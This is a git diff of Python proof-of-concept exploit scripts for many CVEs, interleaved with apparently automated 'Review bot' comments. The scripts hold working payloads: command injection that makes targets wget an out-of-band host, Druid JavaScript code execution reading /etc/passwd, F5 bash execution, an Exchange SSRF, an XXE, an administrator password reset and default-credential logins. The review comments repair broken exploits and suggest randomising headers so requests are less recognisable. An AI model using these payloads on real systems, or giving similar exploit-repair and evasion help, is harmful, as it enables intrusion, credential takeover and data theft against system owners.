if ("""username":""" in resp0.text and """avatarUrl":""" in resp0.text and """node":""" in resp0.text) and (resp0.status_code == 200):
result["success"] = True
diff --git a/2020/CVE-2020-26919/poc/pocsploit/CVE-2020-26919.py b/2020/CVE-2020-26919/poc/pocsploit/CVE-2020-26919.py
index 62d740338..a2701325f 100644
--- a/2020/CVE-2020-26919/poc/pocsploit/CVE-2020-26919.py
+++ b/2020/CVE-2020-26919/poc/pocsploit/CVE-2020-26919.py
@@ -42,7 +42,7 @@ def poc(url):
path = """/login.htm"""
method = "POST"
- data = """submitId=debug&debugCmd=wget+http://oob_domain&submitEnd="""
+ data = """submitId=debug&debugCmd=wget+http://{oob_domain}&submitEnd=""".format(oob_domain=oob_domain)
headers = {'Accept': '*/*'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2020/CVE-2020-28188/poc/pocsploit/CVE-2020-28188.py b/2020/CVE-2020-28188/poc/pocsploit/CVE-2020-28188.py
index 6d2a0b00f..4a90c3a81 100644
--- a/2020/CVE-2020-28188/poc/pocsploit/CVE-2020-28188.py
+++ b/2020/CVE-2020-28188/poc/pocsploit/CVE-2020-28188.py
@@ -41,13 +41,13 @@ def poc(url):
oob_domain,flag = gen_oob_domain()
- path = """/include/makecvs.php?Event=%60wget%20http%3A%2F%2Foob_domain%60"""
+ path = """/include/makecvs.php?Event=%60wget%20http%3A%2F%2F{oob_domain}%60""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
- path = """/tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Foob_domain%60"""
+ path = """/tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{oob_domain}%60""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
diff --git a/2020/CVE-2020-28871/poc/pocsploit/CVE-2020-28871.py b/2020/CVE-2020-28871/poc/pocsploit/CVE-2020-28871.py
index 55407892d..1ade73287 100644
--- a/2020/CVE-2020-28871/poc/pocsploit/CVE-2020-28871.py
+++ b/2020/CVE-2020-28871/poc/pocsploit/CVE-2020-28871.py
@@ -1,4 +1,6 @@
import requests
+import random
+import string
from plugins.oob import verify_request, gen_oob_domain
@@ -36,6 +38,7 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ randstr = gen_randstr(10)
try:
url = format_url(url)
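Review bot: `randstr = gen_randstr(10)` runs before the `try`, and this diff adds `random`/`string` imports but no `gen_randstr` definition to this file (the sibling CVE-2021-21973 change in this commit does add one); unless the helper already exists further down, the first call raises `NameError` and `poc` never runs. Add the same helper here, or move the call inside the `try` so the failure is at least reported like the others.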
@@ -44,16 +47,16 @@ def poc(url):
path = """/assets/php/upload.php"""
method = "POST"
data = """-----------------------------31046105003900160576454225745
-Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
+Content-Disposition: form-data; name="fileToUpload"; filename="{randstr}.php"
Content-Type: image/gif
-GIF89a213213123
- {{base64("`wget http://oob_domain`")}}
+ {{base64("`wget http://%s`")}}
-"""
+""" % oob_domain
headers = {'Content-Type': 'text/xml'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
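Review bot: The body is a hand-assembled multipart payload but is sent with `Content-Type: text/xml`, no `boundary=`, a part header that lacks the `--` prefix and no closing boundary, so the upload handler will not see `fileToUpload` at all. `filename="{randstr}.php"` is also never substituted, because the string is formatted with `% oob_domain`, not `.format(randstr=...)`, and `{{base64("`wget http://%s`")}}` is a template helper that reaches the server as literal text. Letting requests build the upload fixes all of this: `files = {"fileToUpload": ("%s.php" % randstr, b"GIF89a" + payload, "image/gif")}` with `requests.request(method=method, url=url+path, files=files, ...)`, where `payload` is the file content the original template base64-encoded; that content is not recoverable from this hunk and has to be supplied.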
diff --git a/2021/CVE-2021-21287/poc/pocsploit/CVE-2021-21287.py b/2021/CVE-2021-21287/poc/pocsploit/CVE-2021-21287.py
index e297d8cc5..474a60412 100644
--- a/2021/CVE-2021-21287/poc/pocsploit/CVE-2021-21287.py
+++ b/2021/CVE-2021-21287/poc/pocsploit/CVE-2021-21287.py
@@ -43,9 +43,9 @@ def poc(url):
path = """/minio/webrpc"""
method = "POST"
- data = """{"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"}"""
+ data = {"id":1,"jsonrpc":"2.0","params":{"token": "Test"},"method":"web.LoginSTS"}
headers = {'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36', 'Content-Length': '76'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if verify_request(type="dns", flag=flag):
result["success"] = True
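Review bot: Nothing in this request carries `oob_domain`: the JSON-RPC body is a fixed `{"token": "Test"}` and the headers dict has no `Host`, yet success is decided by `verify_request(type="dns", flag=flag)`, so a DNS callback can never be attributed to this request. The SSRF in this CVE is presumably driven by the `Host` header that `web.LoginSTS` uses to build the STS URL, which is what the original template most likely sent; `'Host': oob_domain` in the headers would restore that. The hard-coded `'Content-Length': '76'` is also stale now that requests serialises `data` itself and recomputes the length; drop it.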
diff --git a/2021/CVE-2021-21973/poc/pocsploit/CVE-2021-21973.py b/2021/CVE-2021-21973/poc/pocsploit/CVE-2021-21973.py
index f5cc39926..d57a1ffd2 100644
--- a/2021/CVE-2021-21973/poc/pocsploit/CVE-2021-21973.py
+++ b/2021/CVE-2021-21973/poc/pocsploit/CVE-2021-21973.py
@@ -1,4 +1,6 @@
import requests
+import random
+import string
from plugins.oob import verify_request, gen_oob_domain
@@ -36,6 +38,7 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ randstr = gen_randstr(6)
try:
url = format_url(url)
@@ -44,7 +47,7 @@ def poc(url):
path = """/ui/vropspluginui/rest/services/getvcdetails"""
method = "GET"
data = """"""
- headers = {'Vcip': 'oob_domain', 'Vcpassword': '{{rand_base(6)}}', 'Vcusername': '{{rand_base(6)}}', 'Reqresource': '{{rand_base(6)}}'}
+ headers = {'Vcip': oob_domain, 'Vcpassword': randstr, 'Vcusername': randstr, 'Reqresource': randstr}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if verify_request(type="dns", flag=flag):
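Review bot: The original template drew three independent `rand_base(6)` values for `Vcpassword`, `Vcusername` and `Reqresource`, but the rewrite reuses the single `randstr` for all three, which makes the request more recognisable than it needs to be. Calling `gen_randstr(6)` once per header keeps the old shape: `headers = {'Vcip': oob_domain, 'Vcpassword': gen_randstr(6), 'Vcusername': gen_randstr(6), 'Reqresource': gen_randstr(6)}`. The empty `data = """"""` on a GET is harmless but now inconsistent with the other files in this commit, which dropped the empty body.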
@@ -70,4 +73,7 @@ def format_url(url):
url = 'http://' + url
url = url.rstrip('/')
- return url
\ No newline at end of file
+ return url
+
+def gen_randstr(length):
+ return ''.join(random.choice(string.ascii_letters) for _ in range(length))
\ No newline at end of file
diff --git a/2021/CVE-2021-21985/poc/pocsploit/CVE-2021-21985.py b/2021/CVE-2021-21985/poc/pocsploit/CVE-2021-21985.py
index 2b504d2fb..0942a4ff6 100644
--- a/2021/CVE-2021-21985/poc/pocsploit/CVE-2021-21985.py
+++ b/2021/CVE-2021-21985/poc/pocsploit/CVE-2021-21985.py
@@ -39,9 +39,9 @@ def poc(url):
path = """/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"""
method = "POST"
- data = """{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}"""
+ data = {"methodInput":[{"type":"ClusterComputeResource","value": None,"serverGuid": None}]}
headers = {'Accept': '*/*', 'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""{"result":{"isDisconnected":""" in resp0.text):
result["success"] = True
diff --git a/2021/CVE-2021-22005/poc/pocsploit/CVE-2021-22005.py b/2021/CVE-2021-22005/poc/pocsploit/CVE-2021-22005.py
index 2c699942f..bd214f9e0 100644
--- a/2021/CVE-2021-22005/poc/pocsploit/CVE-2021-22005.py
+++ b/2021/CVE-2021-22005/poc/pocsploit/CVE-2021-22005.py
@@ -39,9 +39,8 @@ def poc(url):
path = """/"""
method = "GET"
- data = """"""
headers = {}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/analytics/telemetry/ph/api/hyper/send?_c&_i=test"""
method = "POST"
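Review bot: `resp0` from the GET on `/` is never read anywhere in this hunk; if the request only exists as a reachability probe or to warm up a session, say so on the line (`# reachability probe; response intentionally unused`), otherwise drop it so the check issues one request fewer. The hunk ends before the body and headers of the telemetry POST, so that request could not be reviewed here.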
diff --git a/2021/CVE-2021-22986/poc/pocsploit/CVE-2021-22986.py b/2021/CVE-2021-22986/poc/pocsploit/CVE-2021-22986.py
index 9c149eff3..513773218 100644
--- a/2021/CVE-2021-22986/poc/pocsploit/CVE-2021-22986.py
+++ b/2021/CVE-2021-22986/poc/pocsploit/CVE-2021-22986.py
@@ -38,15 +38,15 @@ def poc(url):
path = """/mgmt/shared/authn/login"""
method = "POST"
- data = """{"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}"""
+ data = {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
headers = {'Accept-Language': 'en', 'Authorization': 'Basic YWRtaW46', 'Content-Type': 'application/json', 'Cookie': 'BIGIPAuthCookie=1234', 'Connection': 'close'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/mgmt/tm/util/bash"""
method = "POST"
- data = """{"command":"run","utilCmdArgs":"-c id"}"""
+ data = {"command":"run","utilCmdArgs":"-c id"}
headers = {'Accept-Language': 'en', 'X-F5-Auth-Token': '§token§', 'Content-Type': 'application/json', 'Connection': 'close'}
- resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""commandResult""" in resp1.text and """uid=""" in resp1.text):
result["success"] = True
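Review bot: `'X-F5-Auth-Token': '§token§'` on the context line is still an unsubstituted template marker, so resp1 is sent with the literal text `§token§` and the `commandResult`/`uid=` check on the last line can never hold; the commit migrated both bodies to `json=` but left this header untouched. Either substitute it with a real value the way the other files in this batch do with `.format(...)`, or mark the line `# TODO: token placeholder not substituted` so the PoC is not mistaken for a working check. With `json=` the explicit `Content-Type` entries in both header dicts are redundant, though harmless. The enclosing `poc` body starts outside the hunk.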
diff --git a/2021/CVE-2021-24300/poc/pocsploit/CVE-2021-24300.py b/2021/CVE-2021-24300/poc/pocsploit/CVE-2021-24300.py
index 342e5e265..51e709cf2 100644
--- a/2021/CVE-2021-24300/poc/pocsploit/CVE-2021-24300.py
+++ b/2021/CVE-2021-24300/poc/pocsploit/CVE-2021-24300.py
@@ -33,6 +33,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,7 +42,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
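Review bot: The login body on the `+ data =` line is built with `str.format` and no URL-encoding, so a username or password containing `&`, `=`, `+` or `%` would corrupt the form, and any literal `{`/`}` would make `.format` raise; the same pattern appears in CVE-2021-24488, CVE-2021-24510, CVE-2021-24926, CVE-2021-24947, CVE-2021-24991, CVE-2021-25008, CVE-2021-25052, CVE-2021-25063 and CVE-2021-34640. Since this is already a form POST, let requests encode it: `data = {"log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1"}`. The credentials themselves are fixed to `"admin"`/`"admin"` inside `poc(url)` in the previous hunk, which hides the assumption that the target still uses default credentials; lifting them to module-level constants or keyword parameters with defaults would make that assumption explicit and overridable. The enclosing `poc` body continues outside the hunk.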
diff --git a/2021/CVE-2021-24472/poc/pocsploit/CVE-2021-24472.py b/2021/CVE-2021-24472/poc/pocsploit/CVE-2021-24472.py
index bcfafd7b0..2cf03e4d9 100644
--- a/2021/CVE-2021-24472/poc/pocsploit/CVE-2021-24472.py
+++ b/2021/CVE-2021-24472/poc/pocsploit/CVE-2021-24472.py
@@ -39,7 +39,7 @@ def poc(url):
oob_domain,flag = gen_oob_domain()
- path = """/?qtproxycall=http://oob_domain"""
+ path = """/?qtproxycall=http://{oob_domain}""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
diff --git a/2021/CVE-2021-24488/poc/pocsploit/CVE-2021-24488.py b/2021/CVE-2021-24488/poc/pocsploit/CVE-2021-24488.py
index da46a2c51..8247dcd22 100644
--- a/2021/CVE-2021-24488/poc/pocsploit/CVE-2021-24488.py
+++ b/2021/CVE-2021-24488/poc/pocsploit/CVE-2021-24488.py
@@ -33,6 +33,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,7 +42,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2021/CVE-2021-24510/poc/pocsploit/CVE-2021-24510.py b/2021/CVE-2021-24510/poc/pocsploit/CVE-2021-24510.py
index ef20eb3cf..ce567522b 100644
--- a/2021/CVE-2021-24510/poc/pocsploit/CVE-2021-24510.py
+++ b/2021/CVE-2021-24510/poc/pocsploit/CVE-2021-24510.py
@@ -33,6 +33,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,7 +42,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2021/CVE-2021-24926/poc/pocsploit/CVE-2021-24926.py b/2021/CVE-2021-24926/poc/pocsploit/CVE-2021-24926.py
index f148d3f05..7647d25f7 100644
--- a/2021/CVE-2021-24926/poc/pocsploit/CVE-2021-24926.py
+++ b/2021/CVE-2021-24926/poc/pocsploit/CVE-2021-24926.py
@@ -33,6 +33,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,7 +42,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2021/CVE-2021-24947/poc/pocsploit/CVE-2021-24947.py b/2021/CVE-2021-24947/poc/pocsploit/CVE-2021-24947.py
index 7f3f97cd4..ce922e4fd 100644
--- a/2021/CVE-2021-24947/poc/pocsploit/CVE-2021-24947.py
+++ b/2021/CVE-2021-24947/poc/pocsploit/CVE-2021-24947.py
@@ -33,6 +33,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,7 +42,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2021/CVE-2021-24991/poc/pocsploit/CVE-2021-24991.py b/2021/CVE-2021-24991/poc/pocsploit/CVE-2021-24991.py
index d882f807b..2a3dcebc7 100644
--- a/2021/CVE-2021-24991/poc/pocsploit/CVE-2021-24991.py
+++ b/2021/CVE-2021-24991/poc/pocsploit/CVE-2021-24991.py
@@ -33,6 +33,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,7 +42,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2021/CVE-2021-25008/poc/pocsploit/CVE-2021-25008.py b/2021/CVE-2021-25008/poc/pocsploit/CVE-2021-25008.py
index 5071ed997..318f592c6 100644
--- a/2021/CVE-2021-25008/poc/pocsploit/CVE-2021-25008.py
+++ b/2021/CVE-2021-25008/poc/pocsploit/CVE-2021-25008.py
@@ -33,6 +33,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,7 +42,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2021/CVE-2021-25052/poc/pocsploit/CVE-2021-25052.py b/2021/CVE-2021-25052/poc/pocsploit/CVE-2021-25052.py
index 8e33335f9..2cbf1369b 100644
--- a/2021/CVE-2021-25052/poc/pocsploit/CVE-2021-25052.py
+++ b/2021/CVE-2021-25052/poc/pocsploit/CVE-2021-25052.py
@@ -35,6 +35,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -44,11 +46,11 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
- path = """/wp-admin/admin.php?page=wow-company&tab=http://oob_domain/"""
+ path = """/wp-admin/admin.php?page=wow-company&tab=http://{oob_domain}/""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {}
diff --git a/2021/CVE-2021-25063/poc/pocsploit/CVE-2021-25063.py b/2021/CVE-2021-25063/poc/pocsploit/CVE-2021-25063.py
index a578982e0..3c6f0600d 100644
--- a/2021/CVE-2021-25063/poc/pocsploit/CVE-2021-25063.py
+++ b/2021/CVE-2021-25063/poc/pocsploit/CVE-2021-25063.py
@@ -32,6 +32,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -39,7 +41,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2021/CVE-2021-25281/poc/pocsploit/CVE-2021-25281.py b/2021/CVE-2021-25281/poc/pocsploit/CVE-2021-25281.py
index d10189e65..073b45300 100644
--- a/2021/CVE-2021-25281/poc/pocsploit/CVE-2021-25281.py
+++ b/2021/CVE-2021-25281/poc/pocsploit/CVE-2021-25281.py
@@ -38,9 +38,9 @@ def poc(url):
path = """/run"""
method = "POST"
- data = """{"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}"""
+ data = {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"}
headers = {'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""return""" in resp0.text and """tag""" in resp0.text and """jid""" in resp0.text and """salt""" in resp0.text and """wheel""" in resp0.text) and (resp0.status_code == 200):
result["success"] = True
diff --git a/2021/CVE-2021-25646/poc/pocsploit/CVE-2021-25646.py b/2021/CVE-2021-25646/poc/pocsploit/CVE-2021-25646.py
index bdc7e148c..a3b590f56 100644
--- a/2021/CVE-2021-25646/poc/pocsploit/CVE-2021-25646.py
+++ b/2021/CVE-2021-25646/poc/pocsploit/CVE-2021-25646.py
@@ -38,42 +38,42 @@ def poc(url):
path = """/druid/indexer/v1/sampler"""
method = "POST"
- data = """{
-"type":"index",
-"spec":{
- "ioConfig":{
- "type":"index",
- "firehose":{
- "type":"local",
- "baseDir":"/etc",
- "filter":"passwd"
- }
- },
- "dataSchema":{
- "dataSource":"odgjxrrrePz",
- "parser":{
- "parseSpec":{
- "format":"javascript",
- "timestampSpec":{
-
+ data = {
+ "type":"index",
+ "spec":{
+ "ioConfig":{
+ "type":"index",
+ "firehose":{
+ "type":"local",
+ "baseDir":"/etc",
+ "filter":"passwd"
+ }
},
- "dimensionsSpec":{
+ "dataSchema":{
+ "dataSource":"odgjxrrrePz",
+ "parser":{
+ "parseSpec":{
+ "format":"javascript",
+ "timestampSpec":{
+
+ },
+ "dimensionsSpec":{
+ },
+ "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
+ "":{
+ "enabled":"true"
+ }
+ }
+ }
+ }
},
- "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
- "":{
- "enabled":"true"
+ "samplerConfig":{
+ "numRows":10
}
- }
- }
- }
-},
-"samplerConfig":{
- "numRows":10
-}
-}"""
+ }
headers = {'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and ("""application/json""" in str(resp0.headers)) and ("""numRowsRead""" in resp0.text and """numRowsIndexed""" in resp0.text) and (re.search(r"""root:.*:0:0:""",resp0.text)):
result["success"] = True
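Review bot: The success check on the last line calls `re.search`, but no hunk in this file adds `import re`, while other files in this batch gain that import in the same commit; confirm the module already imports it, because if `poc` wraps its body in a catch-all `except` (its `try` is outside the hunk) a `NameError` there would be swallowed and the check would silently never fire. The move from a triple-quoted JSON string to a dict with `json=` is otherwise an improvement, since the old body carried a JSON-invalid `\A` escape that strict parsers reject. The enclosing `poc` body starts outside the hunk.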
diff --git a/2021/CVE-2021-26855/poc/pocsploit/CVE-2021-26855.py b/2021/CVE-2021-26855/poc/pocsploit/CVE-2021-26855.py
index f3b41cfdd..33c177958 100644
--- a/2021/CVE-2021-26855/poc/pocsploit/CVE-2021-26855.py
+++ b/2021/CVE-2021-26855/poc/pocsploit/CVE-2021-26855.py
@@ -46,7 +46,7 @@ def poc(url):
path = """/owa/auth/x.js"""
method = "GET"
data = """"""
- headers = {'Cookie': 'X-AnonResource=true; X-AnonResource-Backend=oob_domain/ecp/default.flt?~3;'}
+ headers = {'Cookie': 'X-AnonResource=true; X-AnonResource-Backend={oob_domain}/ecp/default.flt?~3;'.format(oob_domain=oob_domain)}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if verify_request(type="dns", flag=flag):
diff --git a/2021/CVE-2021-27358/poc/pocsploit/CVE-2021-27358.py b/2021/CVE-2021-27358/poc/pocsploit/CVE-2021-27358.py
index f507a0de2..ad29e26de 100644
--- a/2021/CVE-2021-27358/poc/pocsploit/CVE-2021-27358.py
+++ b/2021/CVE-2021-27358/poc/pocsploit/CVE-2021-27358.py
@@ -39,9 +39,9 @@ def poc(url):
path = """/api/snapshots"""
method = "POST"
- data = """{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}"""
+ data = {"dashboard": {"editable":False,"hideControls":True,"nav":[{"enable":False,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""deleteUrl":""" in resp0.text and """deleteKey":""" in resp0.text) and ("""application/json""" in str(resp0.headers)):
result["success"] = True
diff --git a/2021/CVE-2021-27931/poc/pocsploit/CVE-2021-27931.py b/2021/CVE-2021-27931/poc/pocsploit/CVE-2021-27931.py
index 63c58fdb6..ebf68e23d 100644
--- a/2021/CVE-2021-27931/poc/pocsploit/CVE-2021-27931.py
+++ b/2021/CVE-2021-27931/poc/pocsploit/CVE-2021-27931.py
@@ -45,11 +45,11 @@ def poc(url):
data = """
-
+
]>
&xxe;
-"""
+""".format(oob_domain=oob_domain)
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
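Review bot: The whole XML body now goes through `str.format`, so any literal `{` or `}` anywhere in the document raises at runtime unless doubled; the changed `-`/`+` lines render empty in this view, so the substituted entity line itself cannot be checked here. If the body is ever extended, prefer substituting only the line that carries the OOB host rather than formatting the entire document. The `data =` assignment starts at the top of the hunk, but `poc` itself begins outside it.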
diff --git a/2021/CVE-2021-29203/poc/pocsploit/CVE-2021-29203.py b/2021/CVE-2021-29203/poc/pocsploit/CVE-2021-29203.py
index 74f317566..307c93021 100644
--- a/2021/CVE-2021-29203/poc/pocsploit/CVE-2021-29203.py
+++ b/2021/CVE-2021-29203/poc/pocsploit/CVE-2021-29203.py
@@ -1,4 +1,6 @@
import requests
+import random
+import string
# Vuln Base Info
@@ -33,20 +35,21 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ randstr = gen_randstr(10)
try:
url = format_url(url)
path = """/redfish/v1/SessionService/ResetPassword/1/"""
method = "PATCH"
- data = """{"Password":"{{randstr}}"}"""
+ data = {"Password":"{randstr}".format(randstr=randstr)}
headers = {'Accept': '*/*', 'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/redfish/v1/SessionService/Sessions/"""
method = "POST"
- data = """{"UserName":"Administrator","Password":"{{randstr}}"}"""
+ data = {"UserName":"Administrator","Password":"{randstr}".format(randstr=randstr)}
headers = {'Content-Type': 'application/json'}
